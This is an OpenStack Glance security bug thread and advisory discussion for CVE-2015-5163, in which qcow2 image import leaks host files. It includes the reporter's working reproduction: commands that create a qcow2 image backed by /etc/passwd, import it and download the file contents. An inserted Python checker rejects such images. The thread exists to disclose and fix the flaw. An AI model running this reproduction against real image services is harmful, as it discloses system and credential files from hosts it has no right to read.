[OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)

Bug #1471912 reported by Eric Harney on 2015-07-06
Affects:
- Glance: importance Critical, assigned to Flavio Percoco
- Glance Kilo series: importance Undecided, Unassigned
- OpenStack Security Advisory: importance Critical, assigned to Tristan Cacqueray

Bug Description

This is a security flaw that allows files from the Glance host to be obtained by a user.

I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_format=raw

Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image

$ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image", "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>

This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted

Similar to Cinder bug 1415087.
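The mechanism above is that `qemu-img convert` was run without `-f`, so it auto-detected the input as qcow2 and followed the embedded backing-file reference. The check below is an added example, not Glance's own code (the real fix inspects the image with `qemu-img info` before conversion): it parses the qcow2 header directly and refuses any input whose detected format disagrees with the declared one or that carries a backing file; the `make_qcow2_header` helper and the sample data it builds are constructed for the example.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"  # 0x514649fb, first four bytes of every qcow2 file


def qcow2_backing_file(data):
    """Return the backing file name from a qcow2 header, or None.

    None means the data is not qcow2 or declares no backing file.
    ValueError means the header claims a backing file that does not fit
    inside the data (truncated or malformed image)."""
    if len(data) < 72 or data[:4] != QCOW2_MAGIC:
        return None
    # After the magic: version(u32), backing_file_offset(u64),
    # backing_file_size(u32); all fields are big-endian per the qcow2 spec.
    version, bf_offset, bf_size = struct.unpack(">IQI", data[4:20])
    if version not in (2, 3):
        raise ValueError("unsupported qcow2 version %d" % version)
    if bf_offset == 0 or bf_size == 0:
        return None
    if bf_offset + bf_size > len(data):
        raise ValueError("backing file name lies outside the provided data")
    return data[bf_offset:bf_offset + bf_size].decode("utf-8", "replace")


def safe_to_convert(data, declared_format):
    """Policy of the fix: the declared format must match what the header
    says (so qemu-img's guess cannot differ from it), and a qcow2 image
    must not reference a backing file, since convert would open it."""
    is_qcow2 = data[:4] == QCOW2_MAGIC
    if declared_format == "qcow2" and not is_qcow2:
        return False, "declared qcow2 but header magic does not match"
    if declared_format != "qcow2" and is_qcow2:
        return False, "declared %s but data is qcow2" % declared_format
    if is_qcow2:
        try:
            backing = qcow2_backing_file(data)
        except ValueError as exc:
            return False, "malformed qcow2 header: %s" % exc
        if backing is not None:
            return False, "qcow2 image references backing file %r" % backing
    return True, "ok"


def make_qcow2_header(backing=b""):
    """Constructed sample: a minimal 72-byte qcow2 v2 header (not a usable
    disk image) with an optional backing file name appended after it."""
    bf_offset = 72 if backing else 0
    hdr = QCOW2_MAGIC + struct.pack(">IQI", 2, bf_offset, len(backing))
    # cluster_bits, size, crypt_method, l1_size, l1_table_offset,
    # refcount_table_offset, refcount_table_clusters, nb_snapshots, snapshots_offset
    hdr += struct.pack(">IQIIQQIIQ", 16, 1 << 20, 0, 1, 0, 0, 1, 0, 0)
    return hdr + backing
```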

CVE References

Eric Harney (eharney) wrote :

Oops... clearly meant to report this to the Glance project.

affects: cinder → glance

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

Changed in ossa:
status: New → Incomplete
description: updated
Grant Murphy (gmurphy) wrote :
Jeremy Stanley (fungi) wrote :

Looks like the timing of that addition makes it kilo-only. Still we need a kilo series task added to this bug to track the backport change for the stable/kilo branch.

Flavio Percoco (flaper87) wrote :

This is indeed an issue. I'll work on a patch for it asap and come report it back to the issue.

Flavio Percoco (flaper87) wrote :

Also, the change that introduced this issue is: https://review.openstack.org/#/c/159129/

Changed in ossa:
status: Incomplete → Confirmed
importance: Undecided → Critical
Jeremy Stanley (fungi) wrote :

Well, that commit too is kilo-only, so we at least won't need any fix backported to juno.

Impact description draft:

Title: Glance v2 API host file disclosure through qcow2 backing file
Reporter: Eric Harney (Red Hat)
Products: Glance
Affects: 2015.1.0

Description:
Eric Harney from Red Hat reported a vulnerability in Glance. By importing a qcow2 image with a malicious backing file, an authenticated user may mislead the Glance import task action, resulting in the disclosure of any file on the Glance server to which the Glance process user has access. Only setups using the Glance V2 API are affected by this flaw.

Jeremy Stanley (fungi) wrote :

The impact description looks good to me, but note that we've got 2015.1.1 sneaking up on us RSN so even if it doesn't take long to fix we'll likely need to change the affects line.

Flavio Percoco (flaper87) wrote :

Please, find the patch attached. The patch forbids importing images with backed files entirely.

Besides some pep8 errors, the patch passes run_tests.sh here...

./glance/tests/unit/async/flows/test_import.py:22:1: H306 imports not in alphabetical order (oslo_config.cfg, oslo_concurrency.processutils)
./glance/async/flows/base_import.py:23:1: H306 imports not in alphabetical order (oslo_config.cfg, oslo_concurrency.processutils)
./glance/async/flows/base_import.py:168:9: E303 too many blank lines (2)

Eric Harney (eharney) wrote :

The patch seems reasonable to me. (Not a Glance expert.) Should remove the change to introspect.py.

Flavio Percoco (flaper87) wrote :

Oops, sorry for the pep8 issues and the unwanted change in introspect.py.

Grant Murphy (gmurphy) wrote :

New patch LGTM. Can we get a cores approval to progress this?

Grant Murphy (gmurphy) wrote :

CVE requested.

Grant Murphy (gmurphy) on 2015-07-28
summary: - Format-guessing and file disclosure via image conversion
+ Format-guessing and file disclosure via image conversion (CVE-2015-5163)

@glance-coresec, can we please get an approval before setting a disclosure date?

second proposal for 0001-Don-t-import-files-with-backed-files.patch lgtm.

Thanks Flavio. Please ping me as soon as you have a proposed solution and I will +2/A it.

I see Stuart on subscribed here. Can we get his opinion prior to opening this bug?

Changed in glance:
status: New → Confirmed
importance: Undecided → Critical
assignee: nobody → Flavio Percoco (flaper87)
milestone: none → liberty-3

The proposed patch does not apply cleanly anymore, import causes issues. Here are fixed versions.

If these two last patches are correct and if we can send the pre-OSSA by early Monday, the disclosure date could be:
2015-08-13, 1500UTC

Does that sound good?

Changed in ossa:
assignee: nobody → Tristan Cacqueray (tristan-cacqueray)
Jeremy Stanley (fungi) wrote :

I'm cool with the advisory going out on Thursday, August 13.

The affects line in the impact description is: "2015.1.0 versions through 2015.1.1"

This update fixes:
./glance/async/flows/base_import.py:25:1: H306 imports not in alphabetical order (oslo_utils.excutils, oslo_utils.encodeutils)

This update fixes:

testtools.testresult.real._StringException: Traceback (most recent call last):
  File "glance/tests/unit/async/flows/test_import.py", line 191, in test_import_flow_backed_file_import_to_fs
    failure.Failure)
NameError: global name 'failure' is not defined

Flavio Percoco (flaper87) wrote :

Tested both patches - master and stable - and they both passed. Approved from my side!

Changed in ossa:
status: Confirmed → Fix Committed
information type: Private Security → Public Security

Fix proposed to branch: master
Review: https://review.openstack.org/212567

Changed in glance:
status: Confirmed → In Progress
summary: - Format-guessing and file disclosure via image conversion (CVE-2015-5163)
+ [OSSA 2015-014] Format-guessing and file disclosure via image conversion
+ (CVE-2015-5163)
description: updated

Reviewed: https://review.openstack.org/212568
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=eb99e45829a1b4c93db5692bdbf636a86faa56c4
Submitter: Jenkins
Branch: stable/kilo

commit eb99e45829a1b4c93db5692bdbf636a86faa56c4
Author: Flavio Percoco <email address hidden>
Date: Thu Jul 9 14:44:04 2015 +0200

    Don't import files with backed files

    There's a security issue where it'd be possible to import images with
    backed files using the task engine and then use/convert those to access
    system files or any other file in the system. An example of an attack
    would be to import an image with a backing file pointing to
    `/etc/passwd`, then convert it to raw and download the generated image.

    This patch forbids importing files with backing files entirely. It does
    that in the `_ImportToFS` task, which is the one that imports the image
    locally to then execute other tasks on it. It's not necessary for the
    `_ImportToStore` task because other tasks won't be executed when the
    image is imported in the final store.

    Change-Id: I35f43c3b3f326942fb53b7dadb94700ac4513494
    Closes-bug: #1471912
    (cherry picked from commit d529863a1e8d2307526bdb395b4aebe97f81603d)

tags: added: in-stable-kilo

Reviewed: https://review.openstack.org/212567
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=d529863a1e8d2307526bdb395b4aebe97f81603d
Submitter: Jenkins
Branch: master

commit d529863a1e8d2307526bdb395b4aebe97f81603d
Author: Flavio Percoco <email address hidden>
Date: Thu Jul 9 14:44:04 2015 +0200

    Don't import files with backed files

    There's a security issue where it'd be possible to import images with
    backed files using the task engine and then use/convert those to access
    system files or any other file in the system. An example of an attack
    would be to import an image with a backing file pointing to
    `/etc/passwd`, then convert it to raw and download the generated image.

    This patch forbids importing files with backing files entirely. It does
    that in the `_ImportToFS` task, which is the one that imports the image
    locally to then execute other tasks on it. It's not necessary for the
    `_ImportToStore` task because other tasks won't be executed when the
    image is imported in the final store.

    Change-Id: I35f43c3b3f326942fb53b7dadb94700ac4513494
    Closes-bug: #1471912

Changed in glance:
status: In Progress → Fix Committed
Matthew Thode (prometheanfire) wrote :

Are there some backported patches for at least 2015.1.1? The kilo patch doesn't apply to 2015.1.1 or 2015.1.0 :(

Matthew Thode (prometheanfire) wrote :

Ah, it was the patch that was sent out that was malformed; just get it here instead :D

Changed in ossa:
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2015-09-04
Changed in glance:
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2015-10-15
Changed in glance:
milestone: liberty-3 → 11.0.0